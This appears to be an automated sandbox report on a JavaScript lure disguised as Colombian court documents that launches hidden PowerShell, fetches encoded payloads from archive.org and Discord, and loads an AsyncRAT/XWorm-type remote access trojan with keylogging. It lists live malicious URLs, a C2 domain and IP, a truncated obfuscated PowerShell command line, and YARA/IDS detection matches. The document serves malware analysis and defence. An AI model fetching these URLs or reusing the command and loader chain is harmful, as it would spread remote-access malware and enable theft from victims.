              Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixups source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdb source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdbk= source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Source: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js | Argument value: ['"powershell -nop -w hidden -c "$embolic = \'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAM']
Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FFC3DAAB913h 2_2_00007FFC3DAAB8A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FFC3DAAE464h 2_2_00007FFC3DAAE3D8

Networking

Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 207.241.233.30:443 -> 192.168.2.4:49720
Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 162.159.134.233:443 -> 192.168.2.4:49723
Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 162.159.134.233:443 -> 192.168.2.4:49723
Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 162.159.134.233:443 -> 192.168.2.4:49723
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: unknown | DNS query: name: envio2333.duckdns.org
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: global traffic | TCP traffic: 192.168.2.4:49725 -> 146.70.50.42:3030
Source: global traffic | HTTP traffic detected: GET /attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=680c5371&is=680b01f1&hm=db042c2e54e6549936afd1049d0288e71f75865cd36201bafae8579d5154155e& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: Joe Sandbox View | IP Address: 207.241.233.30 207.241.233.30
Source: Joe Sandbox View | IP Address: 207.241.224.2 207.241.224.2
Source: Joe Sandbox View | IP Address: 162.159.134.233 162.159.134.233
Source: Joe Sandbox View | ASN Name: TENET-1ZA TENET-1ZA
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /download/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: archive.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6/items/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: ia801700.us.archive.orgConnection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 172.217.12.131
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown | TCP traffic detected without corresponding DNS query: 172.217.12.131
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown | TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /download/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: archive.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6/items/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: ia801700.us.archive.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=680c5371&is=680b01f1&hm=db042c2e54e6549936afd1049d0288e71f75865cd36201bafae8579d5154155e& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: archive.org
Source: global traffic | DNS traffic detected: DNS query: ia801700.us.archive.org
Source: global traffic | DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic | DNS traffic detected: DNS query: envio2333.duckdns.org
Source: powershell.exe, 00000002.00000002.1288245604.0000013D95F00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cdn.discordapp.com
Source: powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1288245604.0000013D93D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1288245604.0000013D93D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://archive.org
Source: powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://archive.org/download/new_image_20250413/new_image.jpg
Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com
Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=
Source: powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1288245604.0000013D9416B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia801700.us.archive.org
Source: powershell.exe, 00000002.00000002.1288245604.0000013D9416B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpg
Source: powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: MSBuild.exe, 0000000B.00000002.2432254374.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/xworm_v2
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | HTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 207.241.233.30:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49723 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTR
Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, LimeLogger.cs | .Net Code: KeyboardLayout

              System Summary

              barindex
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '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
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '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 to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DB728592_2_00007FFC3DB72859
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DB712C72_2_00007FFC3DB712C7
              Source: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).jsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3430
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3430Jump to behavior
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, Settings.csBase64 encoded string: 'nC/NzH4pFnJ6SR3DgYH5efzJkqlz2VmVFB7V/kih23fDOnvhNg4fSHe826pbHtI8J6tc4g5AD9D8P1sI5z655Q==', 'I8C+Fxbjy8dweXo6AYxuyIA/EPQJrhtr9bvaaGpOrGdaA59rlNm3z24E0sKpbVwoDcURRVEfpQ/JQdHQvtpN4puCVeFeCd9wxHHPSWVLnFM=', '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', 'gATgBH/PaBDktby8Q4YB+N4mmTnpG93iveYPM1YSbD/oYIx3dH//wjRZ2sQfxGch2ywIwY8d4gYKY+ge39G/ZkHQVa8pA2P6y6qC15+bEBo80zVPZ9oAm744R/tSAJ36ZsbUngCRd7YkC4Qn6sv/GjAhOYH5FKOuIMQdWmKA4M/HioYlDBJ6tfwu+uAXjlMtUHnAREBCgjI/TVUKuOlIph6sctdXc9q7tDqFqe8xIZz16r3261zC/tOhznqEqpe2EM4qqq4H3WTaNNe3aIN0DCmHQWq6MvOWoJzGIop67/S2MzmtTmauiL7kkCIY4quEi/b3EsXHgDW1YaN+aOEzcSh+3Bw+MvwsfPjkI2jZ6Xk0iGmAXODBZ+asdsPrahmPpkUTVbzbNVlQ/ujA1aD1zDQRsi5oEBefRRv6Qy5i8hvR7GLPOoJ6Fh5C0cM
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@9/3@5/4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
